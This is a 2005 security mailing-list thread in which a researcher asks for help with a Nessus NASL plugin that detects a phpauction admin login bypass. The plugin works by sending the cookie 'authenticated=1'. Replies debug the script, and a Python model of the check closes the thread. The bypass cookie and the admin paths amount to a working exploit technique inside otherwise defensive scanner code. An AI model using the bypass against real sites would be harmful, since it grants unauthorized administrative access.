too dumb to write the nasl..
.. I tried to write a nasl for a bug in phpauction I found early this
year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work
completely.

I sniffed the connection while executing the script and the script
successfully uses the bypass possibility, moves to every given
directory, but sadly the script doesn't recognize that it successfully
logged in.

Maybe some of you guys would be so kind to have a look at it? Thanks in
advance.

Toby

# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if(!get_port_state(port))exit(0);

dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin",
                  "auktion/admin", cgi_dirs());

foreach dir (dirs)
{
  req = http_get(item:dir +"/admin.php", port:port);
  res = http_keepalive_send_recv(port:port, data:req);
  if( res == NULL ) exit(0);

  # login form found: resend the same request with the bypass cookie
  if( "Passwort " >< res || "Password" >< res )
  {
    idx = stridx(req, string("\r\n\r\n"));
    req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
    res = http_keepalive_send_recv(port:port, data:req);
    # admin page reached without credentials
    if("Installation" >< res)
    {
      security_hole(port);
    }
    exit(0);
  }
}
# eof
Re: too dumb to write the nasl..
On Fri, Jul 15, 2005 at 09:59:08AM +0200, Tobias Glemser wrote:

> .. I tried to write a nasl for a bug in phpauction I found early this
> year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work
> completely.
>
> I sniffed the connection while executing the script and the script
> successfully uses the bypass possibility, moves to every given
> directory, but sadly the script doesn't recognize that it successfully
> logged in.
>
> Maybe some of you guys would be so kind to have a look at it? Thanks in
> advance.

From strictly a NASL point of view, it looks ok to me. You may want to
add a statement to print results returned by the script; eg,

display("res='", res, "'.\n");

after http_keepalive() statements. If you're running through Nessus,
output will appear in nessusd.dump.

Oh, are you sure the target(s) you're testing are indeed vulnerable to this?


George
--
theall@tenablesecurity.com
Re: too dumb to write the nasl..
At 9:59 +0200 15/7/2005, Tobias Glemser wrote:
>.. I tried to write a nasl for a bug in phpauction I found early this
>year (http://www.securityfocus.com/bid/12069), but the nasl doesn't
>work completely.
>
>I sniffed the connection while executing the script and the script
>successfully uses the bypass possibility, moves to every given
>directory, but sadly the script doesn't recognize that it
>successfully logged in.
>
>Maybe some of you guys would be so kind to have a look at it?
>
>Thanks in advance.
>
>Toby
>
># The script code starts here
>include("http_func.inc");
>include("http_keepalive.inc");
>
>
>port = get_http_port(default:80);
>if(!get_port_state(port))exit(0);
>
>dirs = make_list( "/phpauction/admin", "/admin", "/auction/admin", "auktion/admin", cgi_dirs());
>
>foreach dir (dirs)
>{
> req = http_get(item:dir +"/admin.php", port:port);
> res = http_keepalive_send_recv(port:port, data:req);
> if( res == NULL ) exit(0);
>
> if( "Passwort " >< res || "Password" >< res )
> {
> idx = stridx(req, string("\r\n\r\n"));
> req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
> res = http_keepalive_send_recv(port:port, data:req);
> if("Installation" >< res)
> {
> security_hole(port);
> }
> exit(0);
> }
>}
># eof


There are some errors in this script.

(1) The final explicit directory in the list doesn't have a
leading /. Without this the web server will respond with a
400 Bad Request.

(2) The second exit(0) should be inside the if("Installation" >< res).
That is, after the security_hole(port).

(3) Did you mean to include a tab character after "Passwort"
rather than a space?


Without a vulnerable web server to test against, it's difficult
to know whether there are logic errors.



Dennis.
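The three corrections Dennis lists, carried into a small Python model of the check so the control flow can be exercised offline (added example, not code from the thread or from Nessus). The fake server, its paths and its responses are constructed here; it only mimics the behaviours the replies describe (400 on a path without a leading slash, a login page that is bypassed by the cookie, and a login page that is not).

```python
import re

# Constructed stand-in for the target web server, not a real phpauction install.
def fake_server(request: str) -> str:
    request_line, _, headers = request.partition("\r\n")
    method, path, _ = request_line.split(" ", 2)
    if not path.startswith("/"):
        return "HTTP/1.0 400 Bad Request\r\n\r\n"           # point (1)
    if path == "/admin/admin.php":                          # login page, cookie ignored
        return "HTTP/1.0 200 OK\r\n\r\n<form>Password <input></form>"
    if path != "/auktion/admin/admin.php":
        return "HTTP/1.0 404 Not Found\r\n\r\n"
    if re.search(r"^Cookie:.*\bauthenticated=1\b", headers, re.M):
        return "HTTP/1.0 200 OK\r\n\r\n<h1>Installation</h1>"
    return "HTTP/1.0 200 OK\r\n\r\n<form>Passwort\t<input></form>"  # point (3): tab


def build_request(path: str) -> str:
    # point (1): every directory in the list needs a leading slash
    if not path.startswith("/"):
        path = "/" + path
    return f"GET {path} HTTP/1.0\r\nHost: target\r\n\r\n"


def add_cookie(req: str, cookie: str) -> str:
    # Same idea as stridx()/insstr() in the NASL: splice a Cookie header in
    # just before the blank line that terminates the header block.
    idx = req.index("\r\n\r\n")
    return req[:idx] + "\r\nCookie: " + cookie + req[idx:]


def vulnerable_dir(dirs, send=fake_server):
    """Return the first admin directory whose login is bypassed, else None."""
    for d in dirs:
        req = build_request(d + "/admin.php")
        res = send(req)
        # point (3): match the label without assuming a trailing space
        if re.search(r"Passwort|Password", res):
            res = send(add_cookie(req, "authenticated=1;"))
            # point (2): stop only once the bypass is confirmed; a login
            # page that keeps the cookie out must not end the scan
            if "Installation" in res:
                return d
    return None
```

With the original exit(0) placement the scan would have stopped at "/admin" (a login page that rejects the cookie) and never reached the directory that is actually bypassable.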